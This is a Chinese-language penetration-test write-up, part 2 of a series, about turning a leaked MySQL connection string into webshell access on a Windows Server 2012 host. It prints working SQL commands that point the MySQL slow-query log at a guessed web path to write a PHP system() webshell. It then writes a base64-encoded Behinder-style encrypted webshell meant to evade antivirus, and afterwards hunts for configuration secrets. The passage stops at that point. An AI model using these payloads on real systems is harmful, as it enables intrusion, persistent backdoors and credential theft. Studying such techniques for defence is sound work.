一步步获取你的核心权限(2)

未扫到任何漏洞，怀疑是不是哪里有问题，本地代理用工具再跑一次：

确实不存在，这补丁确实都打了，白忙活了一场。想到之前还有个数据库的连接串还没利用，可能还有点搞头。由于之前代理过了，直接使用navicat连接数据库，查看一下mysql版本是5.7：

由于secure-file-priv的存在，无法尝试提权。nmap扫描了一下数据库的ip地址，发现8090端口还存在一个php系统，服务器是server。于是先查询一下mysql的数据库文件路径，发现不是phpstudy或者wamp等软件一键搭建的：

可要想获取shell，前提要得到web路径，才能写入木马，通过web报错页面、目录扫描都未获取到。于是开始尝试一下IIS的默认路径c:Inetpubwwwroot，写入后访问不到。想到mysql是放在d盘下，因此尝试d盘的d:www、d:Inetpubwwwroot、d:data等路径，都没访问到，最终随手测了下d:web，竟成功写入。通过mysql慢日志写shell过程如下：

set global slow_query_log=’ON’; set global slow_query_log_file=’D:/web/cmd.php’; select ‘<?php echo system($_GET[123]);?>’ or sleep(11); set global slow_query_log=’OFF’;

由于存在杀软，普通的一句话木马直接被杀，因此重新写入一个冰蝎的马：

set global slow_query_log=’ON’; set global slow_query_log_file=’D:/web/t.php’; select ‘<?php file_put_contents(“.1.php”,base64_decode(“PD9waHAKQGVyc**yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7CgkkX1NFU1NJT05bJ2snXT0ka2V5OwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zd**iIik7CgkJCgkJZ**yKCRpPTA7JGk8c3RybGVuKCRwb3N0KTskaSsrKSB7CiAgICAJCQkgJHBvc3RbJGldID0gJHBvc3RbJGldXiRrZXlbJGkrMSYxNV07IAogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19pbnZva2UoJHApIHtldmFsKCRwLiIiKTt9fQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7CiA/PiA=”));?>’ or sleep(11); set global slow_query_log=’OFF’;

写入后直接访问t.php，重新生成.1.php的冰蝎马，直接连接：

查看一下系统权限，有点低：

查看一下ip地址：

由于是该台服务器server2012，无法直接获取windows密码，且存在国外某某科技的杀软，已有的提权工具都被杀了，技术不行绕不过，还是换个思路。

于是，开始翻找文件，看是否会有敏感信息。在服务器上发现多套源码，在其中的一个文件里发现了配置信息：